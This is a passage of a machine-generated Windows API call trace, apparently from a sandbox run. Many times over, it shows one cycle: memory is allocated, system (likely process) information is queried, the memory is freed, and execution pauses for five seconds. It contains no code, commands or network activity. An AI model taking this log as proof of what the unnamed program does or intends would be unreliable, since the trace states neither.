NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0223.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0223.416] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0223.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0223.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0223.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0223.511] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0223.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0223.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0223.601] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0223.601] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0223.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0223.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0223.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0223.728] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0223.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0223.739] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0223.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0223.844] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0223.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0223.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0223.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0223.947] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0223.958] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0223.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0224.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0224.038] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0224.066] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0224.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0224.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0224.166] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0224.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0224.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0224.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0224.273] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0224.285] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0224.285] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0224.375] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0224.375] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0224.384] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0224.384] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0224.490] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0224.491] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0224.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0224.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0224.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0224.623] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0224.634] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0224.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0224.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0224.763] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0224.768] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0224.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0224.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0224.853] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0224.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0224.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0224.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0224.995] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0225.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0225.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0225.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0225.114] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0225.132] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0225.132] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0225.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0225.247] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0225.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0225.252] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0225.350] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0225.350] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0225.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0225.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0225.469] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0225.470] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0225.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0225.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0225.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0225.605] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0225.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0225.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0225.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0225.742] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0225.751] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0225.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0225.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0225.835] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0225.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0225.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0225.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0225.950] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0225.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0225.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0226.053] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0226.054] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0226.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0226.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0226.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0226.183] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0226.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0226.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0226.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0226.295] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0226.297] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0226.297] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0226.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0226.421] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0226.422] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0226.422] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0226.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0226.512] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0226.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0226.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0226.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0226.614] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0226.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0226.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0226.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0226.746] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0226.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0226.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0226.840] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0226.841] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0226.843] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0226.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0227.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0227.001] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0227.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0227.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0227.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0227.106] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0227.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0227.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0227.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0227.198] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0227.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0227.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0227.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0227.292] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0227.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0227.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0227.394] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0227.395] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0227.407] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0227.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0227.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0227.533] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0227.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0227.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0227.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0227.653] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0227.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0227.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0227.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x19f0a8*=0x150000, RegionSize=0x19f0ac, FreeType=0x8000) returned 0x0 [0227.761] NtDelayExecution (Alertable=0, Interval=0x19ea74*=-50000000) returned 0x0 [0227.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x19ea64*=0x0, ZeroBits=0x0, RegionSize=0x19ea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x19ea64*=0x150000, RegionSize=0x19ea68*=0x10000) returned 0x0 [0227.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x150000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x150000, ResultLength=0x0) returned 0x0 [0227.865] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 